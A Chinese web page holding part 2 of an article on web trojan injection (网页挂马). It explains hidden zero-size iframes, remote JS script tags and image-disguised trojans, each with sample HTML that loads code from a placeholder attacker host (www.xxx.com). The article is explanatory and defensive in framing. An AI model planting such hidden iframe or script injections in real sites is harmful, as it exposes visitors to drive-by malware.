dedecms织梦内容管理系统      

--充电学院首页-- | --IT新闻与咨询-- | --电脑应用技术-- | --软件硬件教程-- | --精品资料收藏-- | --其他相关文章-- | --常用优秀软件-- | --桌面图片欣赏-- | --网络淘金技法-- | --媒体网站资源-- | --火狐专题介绍-- |

  当前位置:主页>网络操作技巧>文章内容
网页挂马攻防全接触(2)
来源: 作者:方舟 发布时间:2008-09-25  
stvista
 3、揭秘几种最主要的挂马技术  (1).iframe式挂马
  网页木马被攻击者利用iframe语句,加载到任意网页中都可执行的挂马形式,是最早也是最有效的的一种网络挂马技术。通常的挂马代码如下:
<iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe>

  解释:在打开插入该句代码的网页后,就也就打开了http://www.xxx.com/muma.html页面,但是由于它的长和宽都为“0”,所以很难察觉,非常具有隐蔽性。下面我们做过做个演示,比如在某网页中插入如下代码:  
<iframe src=http://security.ctocio.com.cn width=200 height=200></iframe>

  在“百度”中嵌入了“IT专家网安全版块”的页面,效果如图2。

  (2).js脚本挂马
  js挂马是一种利用js脚本文件调用的原理进行的网页木马隐蔽挂马技术,如:黑客先制作一个.js文件,然后利用js代码调用到挂马的网页。通常代码如下:
<script language=javascript src=http://www.xxx.com/gm.js></script>

  http://www.xxx.com/gm.js就是一个js脚本文件,通过它调用和执行木马的服务端。这些js文件一般都可以通过工具生成,攻击者只需输入相关的选项就可以了,如图3就是一个JS木马的代码。(图3)

  (3).图片伪装挂马
  随着防毒技术的发展,黑手段也不停地更新,图片木马技术逃避杀毒监视的新技术,攻击者将类似:http://www.xxx.com/test.htm中的木马代码植入到test.gif图片文件中,这些嵌入代码的图片都可以用工具生成,攻击者只需输入相关的选项就可以了,如图4。图片木马生成后,再利用代码调用执行,是比较新颖的一种挂马隐蔽方法,实例代码如:
<html>
<iframe src="http://www.xxx.com/test.htm" height=0 width=0> </iframe>
<img src="http://www.xxx.com/test.jpg"></center>
</html>

  注:当用户打开http://www.xxx.com/test.htm是,显示给用户的是**,而http://www.xxx.com/test.htm网页代码也随之运行。(图4)


[收藏] [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
用户名: 新注册) 密码: 匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·教你使用免费的VPN
·如何看一个网站或域名是否被K过
·论坛日常用语大全
·网页内容不能复制最简破解法
·电信的“星空极速“软件破解
·腾讯QQ申请分析
·设置无线路由提高无线网速
·QQ升二代保护,不用观察期的方法
·局域网ARP欺骗的检测与控制办法
·用批处理快速修改本机网卡MAC地
·提供一个英国免费VPN
·五招查出想要知道的IP地址
  相关文章
·网页挂马攻防全接触(1)
·网页挂马攻防全接触(3)
·网页挂马攻防全接触(4)
·ADSL宽带速度之谜
·巧用路由器限制局域网主机的带宽
·巧妙使用用NTFS权限 保卫IE安全
·五个策略保障共享服务器安全(3)
·五个策略保障共享服务器安全(2)
·五个策略保障共享服务器安全(1)
·简单14招助你玩转QQ空间
·什么是域名解析
·域名的访问原理
  兴趣话题
·
·
·全国地图服务
网站为ZQF个人所有 Power by DedeCms 所有文章来自网络,如有冒犯,请email 或 qq告之,谢谢